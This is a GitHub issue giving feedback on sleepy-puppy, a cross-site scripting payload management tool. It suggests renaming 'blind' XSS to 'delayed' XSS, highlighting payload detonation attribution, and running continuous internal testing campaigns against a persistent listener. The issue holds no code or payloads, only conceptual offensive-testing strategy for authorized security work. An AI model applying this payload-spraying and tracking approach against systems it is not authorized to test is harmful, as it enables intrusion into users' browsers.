sleepy-puppy
sleepy-puppy copied to clipboard
OWASP Talk / Project Feedback Capture
I'm using this issue to capture the feedback from our conversation in person at the Netflix campus. First off, I just wanted to reiterate how much I love this project. Great stuff!
So a few recommendations:
- I recommend you change the project's tag to something like, "XSS Payload Management System". Something that indicates that the best thing about it is the ability to capture, manage, and track payloads over long periods of time
- I think the name "Blind" is hurting the project, especially since it's a bit of a misnomer. Blind implies that XSS normally pops for an attacker in THEIR browser, but when you're attacking a real victim it doesn't do that. It pops out of band after being detonated by the victim. So the concept of Blind XSS just isn't valid at all. What your project does is much cooler, and it needs a name that properly captures it, and that name is DELAYED. Even then it's not actually a different type of XSS--it's just a different expectation with regard to receiving a response. So instead of instant gratification, we're waiting for the payload to explode for multiple users, in multiple contexts, over a long span of time. So that's why the whole "Blind" thing is a bit of a red herring. It takes the focus away from where it should be, which is on the RECEIVING end.
- The other main aspect of your tool that you should focus on is the Payload Detonation Attribution (PDA), which is the quite necessary mechanism that allows you to track who detonated the payload, and what their context / environment / rights / etc. were. That's huge, especially when you could be getting detonation events days, weeks, or months after the attack was sent. It's a really cool feature that should take front and center in the explanation of the tool.
- Pulling this all together, I think one of the main use cases an internal company should consider for this is maintaining a persistent listener instance and then shotgunning their apps continuously with tracking information for each campaign, and then waiting. So as payloads start detonating, instantly, or the day after, or months later, you can always link it back to a testing campaign. I think this a really cool Enterprisey way of testing not just the basic input validation and output sanitization of the app itself, but also of the various systems that may interact with application payloads throughout an organization.
Anyway, love the tool. Keep coding.
Thanks @danielmiessler we will discuss these ideas and incorporate them as feature requests.